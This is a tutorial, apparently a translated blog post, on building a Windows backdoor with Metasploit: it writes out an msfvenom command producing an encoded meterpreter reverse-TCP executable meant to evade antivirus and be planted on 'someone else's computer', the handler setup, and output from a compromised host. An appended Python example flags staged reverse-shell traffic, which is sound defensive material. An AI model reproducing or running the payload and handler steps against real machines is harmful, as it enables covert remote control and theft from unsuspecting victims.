1. First, generate our little cutie (the payload executable). Later it can be processed to evade antivirus before being planted on someone else's computer.
[[email protected] ~]# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.1.25 lport=6666 -f exe > ./Lyshark.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai succeeded with size 395 (iteration=1)
x86/shikata_ga_nai succeeded with size 422 (iteration=2)
x86/shikata_ga_nai succeeded with size 449 (iteration=3)
x86/shikata_ga_nai succeeded with size 476 (iteration=4)
x86/shikata_ga_nai chosen with final size 476
Payload size: 476 bytes
Final size of exe file: 73802 bytes

[[email protected] ~]#
[[email protected] ~]# ls
Lyshark.exe
2. Go to Metasploit and do the following:
[[email protected] ~]# msfconsole
This copy of metasploit-framework is more than two weeks old.
 Consider running 'msfupdate' to update to the latest version.

       =[ metasploit v4.16.55-dev- ]
+ -- --=[ 1757 exploits - 1004 auxiliary - 306 post ]
+ -- --=[ 536 payloads - A encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(multi/handler) > set lhost 192.168.1.25
lhost => 192.168.1.25
msf exploit(multi/handler) > set lport 6666
lport => 6666
3. Get our little cutie (Lyshark.exe) to run on the target host by whatever means, then watch the shell connect back.
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.25:6666
[*] Sending stage (179779 bytes) to 192.168.1.10
[*] Meterpreter session 1 opened (192.168.1.25:6666 -> 192.168.1.10:54264) at 2018-… -0400

meterpreter >
4. Now that the host has been compromised, check the system information.
meterpreter > sysinfo
Computer        : DESKTOP-cacduan
OS              : … 14393).
Architecture    : x64
System Language : zh_CN
Domain          : …
Logged On Users : 2
Meterpreter     : x86/
Note: this method only works if the executable is run on the target host itself!
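Seen from the defender's side, the session above has a recognisable network shape: the workstation (192.168.1.10) opens the connection itself, to an unusual port (6666), and the remote side answers with a large one-way transfer (the 179779-byte stage). The following is an added example, not part of the original post, that flags that shape in flow summaries; the record layout, subnet, port baseline and thresholds are constructed assumptions.

```python
import ipaddress

# Constructed flow summaries (not from the original page): who opened the
# connection, to which port, and how many payload bytes each side sent.
# The first record mirrors the session shown on this page.
FLOWS = [
    {"orig_h": "192.168.1.10", "resp_h": "192.168.1.25", "resp_p": 6666,
     "orig_bytes": 0, "resp_bytes": 179779},       # stage pushed to the client
    {"orig_h": "192.168.1.10", "resp_h": "203.0.113.20", "resp_p": 443,
     "orig_bytes": 1840, "resp_bytes": 512000},    # ordinary HTTPS download
    {"orig_h": "192.168.1.11", "resp_h": "192.168.1.25", "resp_p": 6666,
     "orig_bytes": 40, "resp_bytes": 60},          # small exchange, no stage
    {"orig_h": "192.168.1.12", "resp_h": "192.168.1.30", "resp_p": 8444,
     "orig_bytes": 300000, "resp_bytes": 200000},  # two-way bulk transfer
]

WORKSTATIONS = ipaddress.ip_network("192.168.1.0/24")  # assumed client subnet
EXPECTED_PORTS = {53, 80, 123, 443}                    # assumed egress baseline
MIN_STAGE_BYTES = 100_000   # assumed floor; the stage on this page is 179779 bytes
MAX_CLIENT_BYTES = 1_024    # assumed: the client sends little before the stage lands


def is_suspect(flow):
    """True when a workstation dials out to an unexpected port and the
    remote side replies with a large, essentially one-way transfer."""
    client = ipaddress.ip_address(flow["orig_h"])
    return (client in WORKSTATIONS
            and flow["resp_p"] not in EXPECTED_PORTS
            and flow["resp_bytes"] >= MIN_STAGE_BYTES
            and flow["orig_bytes"] <= MAX_CLIENT_BYTES)


def suspect_flows(flows):
    """Return (client, server, port) for every flow matching the heuristic."""
    return [(f["orig_h"], f["resp_h"], f["resp_p"]) for f in flows if is_suspect(f)]


if __name__ == "__main__":
    for client, server, port in suspect_flows(FLOWS):
        print(f"ALERT {client} -> {server}:{port} matches staged reverse-shell shape")
```

The byte thresholds only fit records taken early in a connection; a long-lived session accumulates client-side traffic, so pair this with an egress allow-list rather than relying on it alone.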
Generate EXE backdoor through Metasploit, take shell